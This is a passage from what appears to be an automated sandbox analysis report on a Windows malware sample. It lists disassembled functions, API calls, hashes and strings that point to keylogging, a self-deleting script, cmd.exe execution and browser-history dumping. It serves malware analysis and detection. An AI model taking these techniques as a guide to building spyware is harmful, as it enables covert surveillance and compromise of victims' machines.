                                                                                                                                                                                                                                            • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                                                                            • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                                                                                                                                            Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                                                                            • API String ID: 368326130-2663660666
                                                                                                                                                                                                                                            • Opcode ID: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                                                                                                                                                                                                            • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                                                                                                                                            Function 0040C580 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateExecuteExitFileProcessShell
                                                                                                                                                                                                                                            • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                                                                                                                                            • API String ID: 2309964880-3562070623
                                                                                                                                                                                                                                            • Opcode ID: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                                                                                                                                                            • Instruction ID: ace0f40cc0655528612a0b5402a09b3609fe8f046c2334cef27d09c8f481fd79
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D42145315042405AC324FB25E8969BF77E4AFD1318F50453FF482620F2EF38AA49C69A
                                                                                                                                                                                                                                            Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                                                            • String ID: Offline Keylogger Started
                                                                                                                                                                                                                                            • API String ID: 465354869-4114347211
                                                                                                                                                                                                                                            • Opcode ID: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                                                                                                                                                                                                            • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                                                                                                                                                                                                            Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                                                                                            • String ID: Online Keylogger Started
                                                                                                                                                                                                                                            • API String ID: 112202259-1258561607
                                                                                                                                                                                                                                            • Opcode ID: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                                                                                                                                                                                                            • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                                                                                                            Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0044AB0E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                            • String ID: `@
                                                                                                                                                                                                                                            • API String ID: 2583163307-951712118
                                                                                                                                                                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                            • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                                                                                                                                                                                                            Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                                                                                                                                                            • Opcode ID: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                                                                                                                                                                                                            • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                                                                                                                                            Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                                                                            • String ID: Connection Timeout
                                                                                                                                                                                                                                            • API String ID: 2055531096-499159329
                                                                                                                                                                                                                                            • Opcode ID: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                                                                                                                                                                                                            • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                                                                                                                                                                                                            Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                                                                                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                                                                                                                                                                                                              • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                                                                                                                                                            • Opcode ID: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                                                                                                                                                                                                            • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                                                                                                                                                                                                            Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop
                                                                                                                                                                                                                                            • API String ID: 1818849710-27424756
                                                                                                                                                                                                                                            • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                                                                            Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                                                                                                            • String ID: TUF
                                                                                                                                                                                                                                            • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                                            Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                            • API String ID: 587946157-3896048727
                                                                                                                                                                                                                                            • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                                                                            Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                                            • String ID: pth_unenc
                                                                                                                                                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                                                                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                                                                            Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                            • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                                                                            • API String ID: 1646373207-2714051624
                                                                                                                                                                                                                                            • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                                                                                                                                            • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                                                                                                                                            Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                                                                                                                                                            • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                                                                                                                                            • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                                                                                                                                                                                                            Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                            • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                                                                            • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                                                                                                                                                                                                            Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                                                                                                                                                            • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                                                                                                                                                                                                            Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
